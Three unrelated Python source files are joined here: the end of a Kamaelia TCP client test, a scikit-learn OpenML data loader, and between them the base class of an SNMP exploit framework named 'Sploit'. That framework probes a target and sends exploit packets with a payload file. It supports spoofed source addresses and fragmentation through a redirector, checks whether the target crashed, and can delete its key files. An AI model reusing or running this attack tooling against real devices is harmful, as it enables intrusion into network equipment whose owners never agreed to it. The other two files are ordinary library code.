if isinstance(msg, shutdownMicroprocess):
self.send(msg,"signal")
return True
return False
__kamaelia_components__ = ( TCPClient, )
if __name__ =="__main__":
from Axon.Scheduler import scheduler
from Kamaelia.Chassis.ConnectedServer import SimpleServer
from Kamaelia.Protocol.FortuneCookieProtocol import FortuneCookieProtocol
from Kamaelia.Util.Console import ConsoleEchoer
from Axon.Component import component
class testHarness(component): # Spike component to test interoperability with TCPServer
def __init__(self):
super(testHarness, self).__init__() # I wonder if this can get forced to be called automagically?
import random
self.serverport = random.randint(4000,8000)
self.server = SimpleServer(protocol=FortuneCookieProtocol, port=self.serverport)
self.client = None
self.display = ConsoleEchoer()
def initialiseComponent(self):
self.client = TCPClient("127.0.0.1",self.serverport, delay=1)
self.addChildren(self.server,self.client,self.display)
# self.addChildren(self.server, self.display)
self.link((self.client,"outbox"), (self.display,"inbox") )
return Axon.Ipc.newComponent(*(self.children))
def mainBody(self):
return 1
t = testHarness()
t.activate()
scheduler.run.runThreads(slowmo=0)
|
|
#!/usr/bin/env python
import sys
import os
# Note: Need so that we can find the scapy code.
bindir = os.path.dirname(os.path.abspath(sys.argv[0]))
directory = '%s/..'%bindir
if not directory in sys.path:
sys.path.insert(0, '%s/..'%bindir)
import socket
import argparse
import random
import struct
import traceback
import glob
from hexdump import hexdump
from scapy.all import ASN1_OID, fragment, IP, SNMP, SNMPget, SNMPvarbind, UDP
from tempfile import mkstemp
from log import Log
def public(f):
'''Marks a method as part of the tool's public interface (no-op marker).'''
return f
def internal(f):
'''Marks a method as internal plumbing (no-op marker).'''
return f
def overridable(comment):
'''Decorator factory that documents, via `comment`, how subclasses may
override the wrapped method (a no-op at runtime).'''
def decorator(f): return f
return decorator
class Sploit(object):
'''Base class for exploit tools: bundles the argument parsing, logging and
target-socket setup shared by the individual sploits.'''
DEFAULT_FRAGMENT_SIZE = 460
def __init__(self, tool_name, tool_version):
self.tool_name = tool_name
self.tool_version = tool_version
self.terminateFlingOnException = False
self.env = argparse.Namespace()
self.params = argparse.Namespace()
self.key_data = None
self.vinfo = None
self.log = Log(self.tool_name, self.tool_version)
self.log.open()
self._init_parser()
def __del__(self):
self.log.close()
self.log = None
@property
def description(self):
'''
'''
return '%s (version %s)' % (self.tool_name, self.tool_version)
def _init_parser(self):
'''Build the argparse parser, then register any subcommands collected by
setup_parser() via add_subcommand().'''
self.parser = argparse.ArgumentParser(description = self.description)
self.subcommands = []
self.setup_parser()
subcommands = self.subcommands
del self.subcommands
if subcommands:
subparsers = self.parser.add_subparsers()
for subcommand in subcommands:
subparser = subparsers.add_parser(subcommand.name)
subparser.set_defaults(subcommand = subcommand)
subcommand.setup_parser(subparser)
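# The wiring above implies a duck-typed subcommand interface; a minimal
# conforming object looks like this (illustrative sketch, derived from the
# attributes and methods this file invokes on subcommands):
#
#   class ExampleSubcommand(object):
#       name = 'example'                     # used as the subparser name
#       def setup_parser(self, subparser):   # add subcommand arguments
#           subparser.add_argument('--flag', action='store_true')
#       def post_parse(self, params):        # validate parsed params
#           pass
#       def run(self, sploit):               # called by Sploit.launch()
#           pass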
@public
def add_subcommand(self, subcommand):
'''
'''
self.subcommands.append(subcommand)
@internal
@overridable("Overrides must call base implementation first")
def setup_parser(self):
'''
'''
self.add_logging_params(self.parser)
@internal
def create_socket(self, ip = None, port = None, timeout = None):
'''Create a PseudoSocket to the target, or a FragmentingPseudoSocket when
--spoof/--fragment redirection is in use, configured from the parsed params.'''
if self.params.redir:
exsock = FragmentingPseudoSocket(self.params.dst['ip'], self.params.dst['port'], **self.params.redir)
exsock.fragment_size = self.params.fragment_size or self.DEFAULT_FRAGMENT_SIZE
exsock.raw_send = self.params.raw_send
else:
exsock = PseudoSocket(self.params.dst['ip'], self.params.dst['port'])
exsock.timeout = self.params.timeout
exsock.verbose = self.params.verbose
exsock.log = self.log
return exsock
@overridable("Overrides must call base implementation first")
def pre_parse(self, args):
'''
'''
self.params.args = args
self.env.progname = args[0]
self.env.progbase = os.path.basename(args[0])
self.env.progpath = os.path.realpath(os.path.dirname(args[0]))
def _parse(self, args):
'''
'''
self.pre_parse(args)
self.parser.parse_args(args[1:], self.params)
try:
self.post_parse()
except argparse.ArgumentError, e:
self.parser.error(str(e))
@overridable("Overrides must call base implementation first")
def post_parse(self):
'''
'''
defaults = {'healthcheck': False,
'healthcheckport': None,
'key': None,
'redir': None,
'fragment_size': None,
'subcommand': None,
}
for param in defaults:
if not hasattr(self.params, param):
setattr(self.params, param, defaults[param])
self.params.debug = self.enable_debugging()
if self.params.debug:
self.params.Debug = self.params.verbose
else:
self.params.Debug = 0
if not self.params.redir and self.params.fragment_size:
Sploit.parse_error('The fragment size can only be specified when --redirect or --spoof is used.')
if self.params.healthcheckport:
if not self.params.healthcheck:
Sploit.parse_error('The TCP port for health checks was specified without enabling health checks.')
else:
if self.params.redir and not self.params.redir['listen_port'] and self.params.healthcheck:
Sploit.parse_error('Health checks are not currently supported when spoofing the source address. You must include the --no-health-check option.')
if self.params.key and not os.path.isfile(self.get_key_file()):
Sploit.parse_error("Key file '%s' does not exist" % self.params.key)
if self.params.subcommand:
self.params.subcommand.post_parse(self.params)
@internal
@staticmethod
def parse_error(msg):
'''
'''
raise argparse.ArgumentError(None, msg)
@public
@staticmethod
def add_connection_params(parser, include_spoof = True):
'''
'''
parser.add_argument('-t','--target',
dest = 'dst',
required = True,
type = _parse_target,
help = 'target ip[:port]')
if include_spoof:
parser.add_argument('--spoof',
dest = 'redir',
metavar = 'redir_ip:redir_port:spoofed_ip[:spoofed_port]',
type = lambda x: _parse_redirect(x, False),
default = None,
help = 'send spoofed src packet (with no response expected)')
parser.add_argument('--fragment',
dest = 'redir',
metavar = 'outbound_tunnel_local_ip:outbound_tunnel_local_port:return_tunnel_remote_ip:return_tunnel_remote_port:listen_port',
type = lambda x: _parse_redirect(x, True),
default = None,
help = 'send fragmented packet through redirector (expecting a response)')
parser.add_argument('--fragment-size',
dest = 'fragment_size',
type = int,
default = None,
help = 'maximum fragment size')
parser.add_argument('--nopen-rawsend',
dest = 'raw_send',
action = 'store_true',
default = False,
help = 're-open the connection for each fragment')
parser.add_argument('--no-nopen-rawsend',
dest = 'raw_send',
action = 'store_false',
default = False,
help = 'use the same connection for each fragment')
parser.add_argument('-c','--community',
dest = 'community',
required = True,
help = 'community string')
parser.add_argument('--version',
dest = 'version',
choices = ['v1','v2c'],
default = 'v2c',
help = 'snmp version v1|v2c defaults to v2c')
parser.add_argument('-w','--wait','--timeout',
dest = 'timeout',
type = int,
default = 30,
help = 'sets timeout for connections')
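        # A hypothetical invocation exercising the options registered above
        # (addresses and community string are illustrative only):
        #
        #   ./sploit.py -t 192.0.2.10:161 -c public --version v2c \
        #       --fragment 10.0.0.1:8080:198.51.100.7:5353:9000 \
        #       --fragment-size 512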
@public
@staticmethod
def add_logging_params(parser):
        '''
        Register the verbosity arguments.
        '''
parser.add_argument('-v','--verbose',
dest = 'verbose',
action = 'count',
default = 1,
help = 'verbose logging, add more -v for more verbose logging')
parser.add_argument('-q','--quiet',
dest = 'verbose',
action = 'store_const',
const = 0,
help = 'minimize logging (not recommended)')
@public
@staticmethod
def add_key_params(parser):
        '''
        Register the info-key argument.
        '''
parser.add_argument('-k', '--key',
dest = 'key',
help = "info key - returned from info query")
@public
@staticmethod
def add_healthcheck_params(parser):
        '''
        Register the health-check arguments.
        '''
parser.add_argument('--health-check',
dest = 'healthcheck',
action = 'store_true',
default = True,
help = 'enable health checks (default)')
parser.add_argument('--no-health-check',
dest = 'healthcheck',
action = 'store_false',
default = True,
help = "disable health checks")
parser.add_argument('--health-check-port',
dest = 'healthcheckport',
type = _parse_port,
default = None,
help = "TCP port to use for health checks")
@overridable("Overrides don't need to call base implementation")
def enable_debugging(self):
        '''
        Return True to enable debugging output; disabled by default.
        '''
return False
@public
def launch(self, args):
        '''
        Parse the command line, log the invocation, and run the selected
        subcommand (or run() when no subcommand was given).
        '''
self._parse(args)
self.log('parsed', CommandLine = args)
print "[+] Executing: "," ".join(args)
if self.params.verbose > 1:
print "[+] running from %s" % self.env.progpath
if self.params.subcommand:
self.params.subcommand.run(self)
else:
self.run()
@overridable("Should only be overriden for derived classes that don't use subcommands")
def run(self):
        '''
        Entry point for exploits that do not use subcommands.
        '''
raise NotImplementedError, "Sploit-based classes that don't use subcommands need to override the run method."
@overridable("If overriden, the base implementation does not need to be called.")
def get_key_dir(self):
        '''
        Return the directory where key files are stored.
        '''
return '%s/keys' % self.env.progpath
def get_key_file(self, key = None):
        '''
        Return the path of the key file for the given (or configured) key.
        '''
if not key:
key = self.params.key
return '%s/%s.key' % (self.get_key_dir(), key)
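    # For illustration (paths are hypothetical): with a key directory of
    # /opt/tool/keys and params.key = 'abc123', get_key_file() returns
    # '/opt/tool/keys/abc123.key'.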
@overridable("Must be overriden if the target will be touched. Base implementation should not be called.")
def generate_touch(self):
        '''
        Build and return the touch (probe) packet.
        '''
raise NotImplementedError, "Sploit-based classes need to override the generate_touch method."
@internal
def send_touch(self, packet = None, exsock = None, attempts = 1):
        '''
        Send a touch (probe) packet to the target and pass any response to
        post_touch(). Returns True on a recognized response, False otherwise.
        '''
print '[+] probing target via snmp'
if not packet:
packet = self.generate_touch()
try:
if not exsock:
print "[+] Connecting to %s:%s" % (self.params.dst['ip'], self.params.dst['port'])
exsock = self.create_socket()
while attempts:
attempts -= 1
self.log.packet('sending touch packet', str(packet))
exsock.send(packet)
self.log('sent touch packet')
try:
while 1:
print '*'*40
self.log('receiving touch response')
response = exsock.receive(2048)
self.log.packet('received touch response', response)
if self.params.verbose > 1:
print '[+] Data returned'
hexdump(response)
SNMP(response).show()
print '[+] End of Data returned\n'
if self.post_touch(response):
return True
else:
print response
print '*'*40
print 'listening for responses - Ctrl-C to exit'
except KeyboardInterrupt:
return False
except socket.timeout:
if not attempts:
return False
print 'Retrying...'
except Exception,message:
print '\nExiting ...'
print 'Debug info ','='*40
traceback.print_exc()
print 'Debug info ','='*40
raise RuntimeError,message
@overridable("Must be overriden if the target will be touched. Base implementation should not be called.")
def post_touch(self, response):
        '''
        Examine a touch response; return True if it is recognized.
        '''
raise NotImplementedError, "Sploit-based classes need to override the post_touch method."
@overridable("Should be overriden if the 'info' or 'force' subcommands will be used. Base implementation should be called.")
def report_key(self, key):
        '''
        Report a newly created key to the user.
        '''
pass
@overridable("Should be overriden if checks need to be done before the exploit is called.")
def pre_exploit(self):
        '''
        Hook for checks that must run before the exploit is sent.
        '''
pass
@overridable("Must be overriden. Base implementation should not be called.")
def generate_exploit(self):
        '''
        Build and return the exploit packet(s).
        '''
raise NotImplementedError, "Sploit-based classes need to override the generate_exploit method."
@internal
def send_exploit(self, packets = None, exsock = None):
        '''
        Send the exploit packet(s), validating any response via post_exploit()
        and falling back to a health check when one is configured.
        '''
if not packets:
packets = self.generate_exploit()
if not exsock:
print "[+] Connecting to %s:%s" % (self.params.dst['ip'], self.params.dst['port'])
exsock = self.create_socket()
try:
tail = ' of %d' % len(packets)
except TypeError:
            tail = ' of N'
cur = 1
for packet in packets:
print "[+] packet %d%s"%(cur,tail)
try:
packet = packet[SNMP]
except:
pass
if self.params.verbose:
hexdump(str(packet))
if self.params.verbose > 1:
packet.show()
self.log.packet('sending exploit packet', str(packet))
exsock.send(packet)
self.log('sent exploit packet')
if exsock.expecting_response:
try:
if self.params.verbose:
print '*'*40
self.log('receiving exploit response')
response = exsock.receive(2048)
                    self.log.packet('received exploit response', response)
if self.post_exploit(response):
print "[+] clean return detected"
elif self.params.healthcheck:
print "[-] unexpected response received - performing health check"
self.perform_healthcheck(exsock)
else:
print "[-] unexpected response received"
except KeyboardInterrupt,e:
print "[-] keyboard interrupt before response received"
if self.terminateFlingOnException:
raise KeyboardInterrupt,e
except socket.timeout,e:
okay = False
if self.params.healthcheck:
print "[-] timeout waiting for response - performing health check"
okay = self.perform_healthcheck(exsock)
else:
print "[-] timeout waiting for response - target may have crashed"
if not okay and self.terminateFlingOnException:
raise socket.timeout,e
elif self.params.healthcheck:
print "[+] not expecting response - performing health check"
self.perform_healthcheck(exsock)
else:
print "[+] not expecting response"
cur += 1
@overridable("Overrides do not need to call the base implementation")
def post_exploit(self, response):
        '''
        Examine an exploit response; return True on a clean response.
        '''
snmp = SNMP(response)
if self.params.verbose:
snmp.show()
if self.params.verbose > 1:
hexdump(response)
print "[+] response received"
return True
@internal
def perform_healthcheck(self, exsock):
        '''
        Check whether the target is still alive, either by connecting to the
        configured TCP health-check port or by issuing a benign SNMP get.
        '''
healthy = False
if self.params.healthcheckport:
healthy = exsock.establish_tcp_connection(self.params.healthcheckport)
else:
oid = '1.3.6.1.2.1.1.3.0'
pkt = SNMP(community=self.params.community,PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID(oid))]))
exsock.send(pkt[SNMP])
try:
response = exsock.receive(2048)
healthy = True
except KeyboardInterrupt,e:
print "[-] keyboard interrupt before response received"
if self.terminateFlingOnException:
raise KeyboardInterrupt,e
            except socket.timeout,e:
                print "[-] no response from health check - target may have crashed"
                if self.terminateFlingOnException:
                    raise socket.timeout,e
if healthy:
print "[+] health check succeeded"
else:
print "[-] health check failed"
return healthy
class Subcommand(object):
@overridable("Overrides should call base implementation first")
def setup_parser(self, parser):
        '''
        Register arguments for this subcommand.
        '''
Sploit.add_logging_params(parser)
@overridable("Overrides should call base implementation first")
def post_parse(self, params):
        '''
        Validate this subcommand's parameters after parsing.
        '''
pass
@overridable("Overrides don't need to call base implementation")
def run(self, exp):
        '''
        Execute the subcommand.
        '''
pass
class _KeyCreationSubcommand(Subcommand):
@overridable("Overrides should call base implementation first")
def setup_parser(self, parser):
super(_KeyCreationSubcommand, self).setup_parser(parser)
@overridable("Overrides don't need to call base implementation")
def run(self, exp):
self.get_key_data(exp)
exp.load_vinfo()
if not os.path.isdir(exp.get_key_dir()):
os.mkdir(exp.get_key_dir())
fd, filename = mkstemp(dir = exp.get_key_dir(), prefix='', suffix='.key')
os.write(fd, exp.key_data + '\n')
key = filename.split('/')[-1][:-4]
os.close(fd)
exp.report_key(key)
@overridable("Must be overriden. Base implementation should not be called.")
def get_key_data(self, exp):
raise NotImplementedError, "_KeyCreationSubcommand derived classes must override the get_key_data method."
class ForceSubcommand(_KeyCreationSubcommand):
name = 'force'
label = 'key_data'
help = 'data used to populate the key file'
@overridable("Overrides should call base implementation first")
def setup_parser(self, parser):
super(ForceSubcommand, self).setup_parser(parser)
parser.add_argument(dest = 'key_data',
metavar = self.label,
help = self.help)
def get_key_data(self, exp):
exp.key_data = exp.params.key_data
class InfoSubcommand(_KeyCreationSubcommand):
name = 'info'
@overridable("Overrides should call base implementation first")
def setup_parser(self, parser):
super(InfoSubcommand, self).setup_parser(parser)
Sploit.add_connection_params(parser, include_spoof=False)
def get_key_data(self, exp):
if not exp.send_touch():
raise RuntimeError, '[-] Touch failed.'
class ExecSubcommand(Subcommand):
name = 'exec'
perform_health_check = True
expect_filename_argument = True
filename_label = 'filename'
filename_help = 'payload used for the exploit'
@overridable("Overrides should call base implementation first")
def setup_parser(self, parser):
super(ExecSubcommand, self).setup_parser(parser)
Sploit.add_connection_params(parser)
Sploit.add_key_params(parser)
if self.expect_filename_argument:
def file_exists(filename):
if not os.path.isfile(filename):
Sploit.parse_error("The file '%s' does not exist." % filename)
return filename
parser.add_argument(dest = 'filename',
metavar = self.filename_label,
type = file_exists,
help = self.filename_help)
if self.perform_health_check:
Sploit.add_healthcheck_params(parser)
@overridable("Overrides don't need to call base implementation")
def run(self, exp):
if exp.params.key:
with open(exp.get_key_file(),'r') as keyfile:
exp.key_data = keyfile.readline().strip()
else:
if not exp.send_touch():
raise RuntimeError, '[-] Touch failed. Aborting.'
exp.load_vinfo()
exp.pre_exploit()
exp.send_exploit()
class BurnSubcommand(Subcommand):
name = 'burn'
@overridable("Overrides should call base implementation first")
def setup_parser(self, parser):
        '''
        Register the key selection arguments (a single key or --all).
        '''
super(BurnSubcommand, self).setup_parser(parser)
group = parser.add_mutually_exclusive_group(required = True)
Sploit.add_key_params(group)
group.add_argument('--all','--Burn',
action = 'store_true',
dest = 'burnburn',
default = False,
help = "remove all keys")
@overridable("Overrides don't need to call base implementation")
def run(self, exp):
        '''
        Delete the selected key file(s).
        '''
if not exp.params.burnburn:
keys = '%s/%s.key' % (exp.get_key_dir(), exp.params.key)
else:
keys = '%s/*.key' % exp.get_key_dir()
l = glob.glob(keys)
for f in l:
print '[+] deleting %s' % f
os.unlink(f)
class PseudoSocket(object):
def __init__(self, target_ip, target_port):
self.target_ip = target_ip
self.target_port = target_port
self.timeout = 30
self.verbose = 1
self.sock = None
self.log = None
    def create(self):
        # Initialize so the checks below are safe even when no address
        # resolves or socket creation fails on the first attempt.
        sock = None
        try:
            msg = "getaddrinfo returns an empty list"
            for res in socket.getaddrinfo(self.target_ip, self.target_port, 0, socket.SOCK_DGRAM):
                af, socktype, proto, canonname, sa = res
                try:
                    sock = socket.socket(af, socktype, proto)
                    sock.settimeout(self.timeout)
                    sock.connect(sa)
                except socket.error, msg:
                    if sock:
                        sock.close()
                        sock = None
                    continue
                break
            if not sock:
                raise socket.error, msg
        except socket.error:
            raise RuntimeError,'[+] Cannot connect to %s:%d\n[+] port might not be up' % (self.target_ip, self.target_port)
        return sock
def send(self, packet):
if not self.sock:
self.sock = self.create()
self.sock.sendall(str(packet))
def receive(self, bytes):
if not self.sock:
self.sock = self.create()
return self.sock.recv(bytes)
def close(self):
if self.sock:
self.sock.close()
self.sock = None
@property
def expecting_response(self):
return True
@property
def destination_ip(self):
return self.target_ip
    def establish_tcp_connection(self, port):
        ret = False
        sock = None
        try:
            sock = socket.socket()
            sock.settimeout(self.timeout)
            sock.connect((self.destination_ip, port))
            sock.sendall('\n')
            sock.recv(10)
            ret = True
        except socket.error:
            pass
        finally:
            if sock:
                sock.close()
        return ret
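# A minimal usage sketch of PseudoSocket (the target address is hypothetical):
#
#   ps = PseudoSocket('192.0.2.10', 161)
#   ps.timeout = 10
#   ps.send(packet)        # lazily creates the UDP socket on first use
#   data = ps.receive(2048)
#   ps.close()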
class FragmentingPseudoSocket(PseudoSocket):
def __init__(self, target_ip, target_port, outbound_ip, outbound_port, return_ip, return_port, listen_port):
super(FragmentingPseudoSocket, self).__init__(target_ip, target_port)
self.outbound_ip = outbound_ip
self.outbound_port = outbound_port
self.return_ip = return_ip
self.return_port = return_port or random.randint(2048,65500)
self.listen_port = listen_port
self.fragment_size = Sploit.DEFAULT_FRAGMENT_SIZE
self.raw_send = False
def create(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
sock.settimeout(self.timeout)
sock.connect((self.outbound_ip, self.outbound_port))
return sock
def send(self, packet):
original_packet = IP(dst=self.target_ip,src=self.return_ip)/UDP(dport=self.target_port,sport=self.return_port)/packet
if self.verbose > 1:
print "Original packet:"
original_packet.show()
hexdump(str(original_packet))
fragments = fragment(original_packet, fragsize = self.fragment_size)
try:
i = 1
for frag in fragments:
if self.verbose > 1:
print "Fragment %d of %d:" % (i, len(fragments))
frag.show()
frag = str(frag)
length = struct.pack(">I", len(frag))
if not self.sock:
print '[+] connecting ...'
self.sock = self.create()
print '[+] sending part %d of %d now..' % (i, len(fragments))
hexdump(frag)
if self.log:
self.log.packet('sending fragment %d of %d' % (i, len(fragments)), frag)
self.sock.send(length)
self.sock.send(frag)
if self.log:
self.log('sent fragment %d of %d' % (i, len(fragments)))
i += 1
if self.raw_send:
if self.log:
self.log('forcing a new connection due to raw_send flag')
self.close()
except KeyboardInterrupt,e:
print "[-] keyboard interrupt while connecting/sending to redirector"
raise KeyboardInterrupt,e
except socket.timeout,e:
print "[-] timeout while connecting/sending to redirector"
raise socket.timeout,e
finally:
self.close()
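    # Each fragment above is framed for the redirector as a 4-byte big-endian
    # length prefix followed by the raw fragment bytes. A hypothetical reader
    # on the redirector side (short reads glossed over for brevity):
    #
    #   def read_frames(sock):
    #       while True:
    #           hdr = sock.recv(4)
    #           if len(hdr) < 4:
    #               return
    #           (n,) = struct.unpack(">I", hdr)
    #           yield sock.recv(n)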
    def receive(self, bytes):
        sock = None
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            sock.settimeout(self.timeout)
            sock.bind(("", self.listen_port))
            response = sock.recv(bytes)
            sock.close()
            return response
        except:
            if sock:
                sock.close()
            raise
@property
def expecting_response(self):
        return bool(self.listen_port)
@property
def destination_ip(self):
return self.outbound_ip
def _parse_ip(ip):
    '''
    Validate a dotted-quad IP address, returning its normalized form.
    '''
    try:
        x = socket.inet_aton(ip)
        return socket.inet_ntoa(x)
    except socket.error:
        Sploit.parse_error("'%s' is an invalid IP address" % ip)
def _parse_port(port):
    '''
    Validate a numeric port value.
    '''
    try:
        return int(port)
    except ValueError:
        Sploit.parse_error("'%s' is an invalid port" % port)
def _parse_target(text):
    '''
    Parse an 'ip[:port]' target specification, defaulting to SNMP port 161.
    '''
parts = text.split( ':' )
if len(parts) == 2:
return {'ip': _parse_ip(parts[0]), 'port': _parse_port(parts[1])}
else:
return {'ip': _parse_ip(text), 'port': 161}
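# For example, _parse_target('192.0.2.5:1161') returns
# {'ip': '192.0.2.5', 'port': 1161}, while _parse_target('192.0.2.5') falls
# back to the default SNMP port 161.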
def _parse_redirect(text, expect_response):
    '''
    Parse the --spoof/--fragment redirection specification into a dict of
    outbound/return addresses and the optional listen port.
    '''
    parts = text.split(':')
    if expect_response and len(parts) != 5:
        Sploit.parse_error('the --fragment option requires 5 fields as follows outbound_tunnel_local_ip:outbound_tunnel_local_port:return_tunnel_remote_ip:return_tunnel_remote_port:listen_port')
    if not expect_response and not (3 <= len(parts) <= 4):
        Sploit.parse_error('the --spoof option requires 3 or 4 fields as follows redir_ip:redir_port:spoofed_ip[:spoofed_port]')
redir = {}
redir['outbound_ip'] = _parse_ip(parts[0])
redir['outbound_port'] = _parse_port(parts[1])
redir['return_ip'] = _parse_ip(parts[2])
redir['return_port'] = _parse_port(parts[3]) if (len(parts) > 3) else None
redir['listen_port'] = _parse_port(parts[4]) if (len(parts) > 4) else None
return redir
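# A worked example (addresses are hypothetical): parsing the --fragment value
# '10.0.0.1:8080:198.51.100.7:5353:9000' with expect_response=True yields
# {'outbound_ip': '10.0.0.1', 'outbound_port': 8080,
#  'return_ip': '198.51.100.7', 'return_port': 5353, 'listen_port': 9000}.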
if __name__ == '__main__':
import unittest
import sploit_test
runner = unittest.TextTestRunner()
runner.run(sploit_test.suite)
|
|
import gzip
import json
import os
import shutil
import hashlib
from os.path import join
from warnings import warn
from contextlib import closing
from functools import wraps
from typing import Callable, Optional, Dict, Tuple, List, Any, Union
import itertools
from collections.abc import Generator
from collections import OrderedDict
from functools import partial
from urllib.request import urlopen, Request
import numpy as np
import scipy.sparse
from ..externals import _arff
from ..externals._arff import ArffSparseDataType, ArffContainerType
from . import get_data_home
from urllib.error import HTTPError
from ..utils import Bunch
from ..utils import is_scalar_nan
from ..utils import get_chunk_n_rows
from ..utils import _chunk_generator
from ..utils import check_pandas_support # noqa
__all__ = ["fetch_openml"]
_OPENML_PREFIX = "https://openml.org/"
_SEARCH_NAME = "api/v1/json/data/list/data_name/{}/limit/2"
_DATA_INFO = "api/v1/json/data/{}"
_DATA_FEATURES = "api/v1/json/data/features/{}"
_DATA_QUALITIES = "api/v1/json/data/qualities/{}"
_DATA_FILE = "data/v1/download/{}"
OpenmlQualitiesType = List[Dict[str, str]]
OpenmlFeaturesType = List[Dict[str, str]]
def _get_local_path(openml_path: str, data_home: str) -> str:
return os.path.join(data_home, "openml.org", openml_path + ".gz")
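# For instance (paths are illustrative), _get_local_path("data/v1/download/61",
# "/tmp/sk") maps to "/tmp/sk/openml.org/data/v1/download/61.gz".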
def _retry_with_clean_cache(openml_path: str, data_home: Optional[str]) -> Callable:
"""If the first call to the decorated function fails, the local cached
file is removed, and the function is called again. If ``data_home`` is
``None``, then the function is called once.
"""
def decorator(f):
@wraps(f)
def wrapper(*args, **kw):
if data_home is None:
return f(*args, **kw)
try:
return f(*args, **kw)
except HTTPError:
raise
except Exception:
warn("Invalid cache, redownloading file", RuntimeWarning)
local_path = _get_local_path(openml_path, data_home)
if os.path.exists(local_path):
os.unlink(local_path)
return f(*args, **kw)
return wrapper
return decorator
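# A minimal sketch of how the decorator is meant to be applied (the endpoint
# and cache directory below are hypothetical):
#
#   @_retry_with_clean_cache("api/v1/json/data/61", "/tmp/sk")
#   def _load():
#       with closing(_open_openml_url("api/v1/json/data/61", "/tmp/sk")) as r:
#           return json.loads(r.read().decode("utf-8"))
#
# A first failure that is not an HTTPError purges the cached file and retries
# the call exactly once.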
def _open_openml_url(openml_path: str, data_home: Optional[str]):
"""
Returns a resource from OpenML.org. Caches it to data_home if required.
Parameters
----------
openml_path : str
        OpenML URL that will be accessed. This will be prefixed with
_OPENML_PREFIX
data_home : str
Directory to which the files will be cached. If None, no caching will
be applied.
Returns
-------
result : stream
A stream to the OpenML resource
"""
def is_gzip_encoded(_fsrc):
return _fsrc.info().get("Content-Encoding", "") == "gzip"
req = Request(_OPENML_PREFIX + openml_path)
req.add_header("Accept-encoding", "gzip")
if data_home is None:
fsrc = urlopen(req)
if is_gzip_encoded(fsrc):
return gzip.GzipFile(fileobj=fsrc, mode="rb")
return fsrc
local_path = _get_local_path(openml_path, data_home)
if not os.path.exists(local_path):
try:
os.makedirs(os.path.dirname(local_path))
except OSError:
# potentially, the directory has been created already
pass
try:
with closing(urlopen(req)) as fsrc:
opener: Callable
if is_gzip_encoded(fsrc):
opener = open
else:
opener = gzip.GzipFile
with opener(local_path, "wb") as fdst:
shutil.copyfileobj(fsrc, fdst)
except Exception:
if os.path.exists(local_path):
os.unlink(local_path)
raise
# XXX: First time, decompression will not be necessary (by using fsrc), but
# it will happen nonetheless
return gzip.GzipFile(local_path, "rb")
class OpenMLError(ValueError):
"""HTTP 412 is a specific OpenML error code, indicating a generic error"""
pass
def _get_json_content_from_openml_api(
url: str, error_message: Optional[str], data_home: Optional[str]
) -> Dict:
"""
Loads json data from the openml api
Parameters
----------
url : str
The URL to load from. Should be an official OpenML endpoint
error_message : str or None
The error message to raise if an acceptable OpenML error is thrown
        (acceptable error is, e.g., data id not found. Other errors, like
        404s, are raised with their native error message)
data_home : str or None
Location to cache the response. None if no cache is required.
Returns
-------
json_data : json
the json result from the OpenML server if the call was successful.
An exception otherwise.
"""
@_retry_with_clean_cache(url, data_home)
def _load_json():
with closing(_open_openml_url(url, data_home)) as response:
return json.loads(response.read().decode("utf-8"))
try:
return _load_json()
except HTTPError as error:
# 412 is an OpenML specific error code, indicating a generic error
# (e.g., data not found)
if error.code != 412:
raise error
# 412 error, not in except for nicer traceback
raise OpenMLError(error_message)
def _split_sparse_columns(
arff_data: ArffSparseDataType, include_columns: List
) -> ArffSparseDataType:
"""
obtains several columns from sparse arff representation. Additionally, the
column indices are re-labelled, given the columns that are not included.
(e.g., when including [1, 2, 3], the columns will be relabelled to
[0, 1, 2])
Parameters
----------
arff_data : tuple
A tuple of three lists of equal size; first list indicating the value,
second the x coordinate and the third the y coordinate.
include_columns : list
A list of columns to include.
Returns
-------
arff_data_new : tuple
Subset of arff data with only the include columns indicated by the
include_columns argument.
"""
arff_data_new: ArffSparseDataType = (list(), list(), list())
reindexed_columns = {
column_idx: array_idx for array_idx, column_idx in enumerate(include_columns)
}
for val, row_idx, col_idx in zip(arff_data[0], arff_data[1], arff_data[2]):
if col_idx in include_columns:
arff_data_new[0].append(val)
arff_data_new[1].append(row_idx)
arff_data_new[2].append(reindexed_columns[col_idx])
return arff_data_new
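# A worked example: with arff_data = ([10, 20, 30], [0, 0, 1], [0, 2, 3]) and
# include_columns = [2, 3], only the last two entries survive and their column
# indices are relabelled, giving ([20, 30], [0, 1], [0, 1]).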
def _sparse_data_to_array(
arff_data: ArffSparseDataType, include_columns: List
) -> np.ndarray:
    # turns the sparse data back into an array (can't use toarray() here,
    # as that only works on numeric data)
num_obs = max(arff_data[1]) + 1
y_shape = (num_obs, len(include_columns))
reindexed_columns = {
column_idx: array_idx for array_idx, column_idx in enumerate(include_columns)
}
# TODO: improve for efficiency
y = np.empty(y_shape, dtype=np.float64)
for val, row_idx, col_idx in zip(arff_data[0], arff_data[1], arff_data[2]):
if col_idx in include_columns:
y[row_idx, reindexed_columns[col_idx]] = val
return y
def _convert_arff_data(
arff: ArffContainerType,
col_slice_x: List[int],
col_slice_y: List[int],
shape: Optional[Tuple] = None,
) -> Tuple:
"""
converts the arff object into the appropriate matrix type (np.array or
scipy.sparse.csr_matrix) based on the 'data part' (i.e., in the
liac-arff dict, the object from the 'data' key)
Parameters
----------
arff : dict
As obtained from liac-arff object.
col_slice_x : list
The column indices that are sliced from the original array to return
as X data
col_slice_y : list
The column indices that are sliced from the original array to return
as y data
Returns
-------
X : np.array or scipy.sparse.csr_matrix
y : np.array
"""
arff_data = arff["data"]
if isinstance(arff_data, Generator):
if shape is None:
raise ValueError("shape must be provided when arr['data'] is a Generator")
if shape[0] == -1:
count = -1
else:
count = shape[0] * shape[1]
data = np.fromiter(
itertools.chain.from_iterable(arff_data), dtype="float64", count=count
)
data = data.reshape(*shape)
X = data[:, col_slice_x]
y = data[:, col_slice_y]
return X, y
elif isinstance(arff_data, tuple):
arff_data_X = _split_sparse_columns(arff_data, col_slice_x)
num_obs = max(arff_data[1]) + 1
X_shape = (num_obs, len(col_slice_x))
X = scipy.sparse.coo_matrix(
(arff_data_X[0], (arff_data_X[1], arff_data_X[2])),
shape=X_shape,
dtype=np.float64,
)
X = X.tocsr()
y = _sparse_data_to_array(arff_data, col_slice_y)
return X, y
else:
# This should never happen
raise ValueError("Unexpected Data Type obtained from arff.")
